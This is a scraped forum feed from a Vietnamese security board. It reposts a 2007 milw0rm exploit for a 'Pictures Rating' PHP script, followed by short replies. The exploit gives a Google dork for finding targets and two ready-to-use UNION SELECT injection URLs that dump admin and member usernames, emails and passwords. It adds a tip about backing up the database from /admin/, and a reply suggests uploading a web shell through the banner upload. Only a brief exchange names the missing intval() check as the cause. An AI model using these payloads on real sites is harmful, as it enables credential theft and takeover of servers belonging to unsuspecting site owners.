<![CDATA[Latest posts for the topic "Pictures Rating SQL Injection Vulnerbility"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Pictures Rating SQL Injection Vulnerbility Code:
--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Latest Pictures" Name   Gender   Profile   Rating


DESCRIPTION:
pull out admin/members info


EXPLOITS:
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),5,6,7/**/FROM/**/admin/*
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,email,0x3a,password,0x3c623e),5,6,7/**/FROM/**/members/*


NOTE/TIP:
you must register first
admin login is at /admin/ you can backup the DB there.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-18]
Với chức năng Upload Banner trong CP thì chúng ta có thể upshell lên và... muốn làm gì thì làm :lol:) :P) :P) ]]>
/hvaonline/posts/list/12386.html#72161 /hvaonline/posts/list/12386.html#72161 GMT
Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#72195 /hvaonline/posts/list/12386.html#72195 GMT Pictures Rating SQL Injection Vulnerbility allintext:"Latest Pictures" Name Gender Profile Rating   ]]> /hvaonline/posts/list/12386.html#72197 /hvaonline/posts/list/12386.html#72197 GMT Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#72201 /hvaonline/posts/list/12386.html#72201 GMT Re: Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#75191 /hvaonline/posts/list/12386.html#75191 GMT Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#75312 /hvaonline/posts/list/12386.html#75312 GMT Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#75387 /hvaonline/posts/list/12386.html#75387 GMT Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#79558 /hvaonline/posts/list/12386.html#79558 GMT Re: Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#79580 /hvaonline/posts/list/12386.html#79580 GMT Re: Pictures Rating SQL Injection Vulnerbility Lại cái tội quên intval() đây mà.  Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy?]]> /hvaonline/posts/list/12386.html#88079 /hvaonline/posts/list/12386.html#88079 GMT Re: Pictures Rating SQL Injection Vulnerbility

phstiger wrote:
Lại cái tội quên intval() đây mà. 
Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy? 
Bạn nên xem tại đây: http://www.php.net/manual/en/function.intval.php]]>
/hvaonline/posts/list/12386.html#88098 /hvaonline/posts/list/12386.html#88098 GMT
Re: Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#88620 /hvaonline/posts/list/12386.html#88620 GMT Re: Pictures Rating SQL Injection Vulnerbility /hvaonline/posts/list/12386.html#89021 /hvaonline/posts/list/12386.html#89021 GMT